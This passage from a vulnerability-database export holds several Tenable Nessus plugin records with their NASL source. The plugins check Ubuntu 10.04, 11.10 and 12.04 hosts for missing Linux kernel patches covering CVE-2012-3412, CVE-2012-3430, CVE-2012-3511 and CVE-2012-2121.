value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-348-ec2\", pkgver:\"2.6.32-348.54\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-ec2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:37:56", "references": [], "pluginID": "62199", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-19T00:00:00", "title": "Ubuntu 10.04 LTS : linux vulnerabilities (USN-1572-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-15T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-preempt", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia"], "id": "UBUNTU_USN-1572-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62199", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1572-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62199);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/15 12:24:49\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1572-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux vulnerabilities (USN-1572-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-preempt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-386\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-generic\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-generic-pae\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-lpia\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-preempt\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-server\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-versatile\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-virtual\", pkgver:\"2.6.32-43.97\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-386 / linux-image-2.6-generic / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:34:59", "references": [], "pluginID": "62212", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-20T00:00:00", "title": "Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1575-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server"], "id": "UBUNTU_USN-1575-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62212", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1575-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62212);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1575-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1575-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-generic\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-generic-pae\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-server\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-virtual\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:18", "references": [], "pluginID": "62240", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2012-09-24T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-1579-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2016-10-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1579-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1579-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62240);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/10/26 14:05:58 $\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1579-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-1579-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2016 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-generic\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-generic-pae\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-highbank\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-virtual\", pkgver:\"3.2.0-31.50\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:26", "references": ["http://www.ubuntu.com/usn/usn-1578-1/"], "pluginID": "62239", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "edition": 5, "reporter": "Tenable", "published": "2012-09-24T00:00:00", "title": "USN-1578-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2016-12-01T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux"], "id": "UBUNTU_USN-1578-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62239", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1578-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62239);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_xref(name:\"USN\", value:\"1578-1\");\n\n script_name(english:\"USN-1578-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1578-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-1216-omap4\", pkgver:\"3.0.0-1216.28\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:40:30", "references": ["http://www.ubuntu.com/usn/usn-1577-1/"], "pluginID": "62238", "description": "A flaw was discovered in the Linux kernel's KVM (kernel virtual machine). An administrative user in the guest OS could leverage this flaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 5, "reporter": "Tenable", "published": "2012-09-24T00:00:00", "title": "USN-1577-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-2121", "CVE-2012-3430"], "modified": "2016-12-01T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux"], "id": "UBUNTU_USN-1577-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62238", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1577-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62238);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-2121\", \"CVE-2012-3412\", \"CVE-2012-3430\", 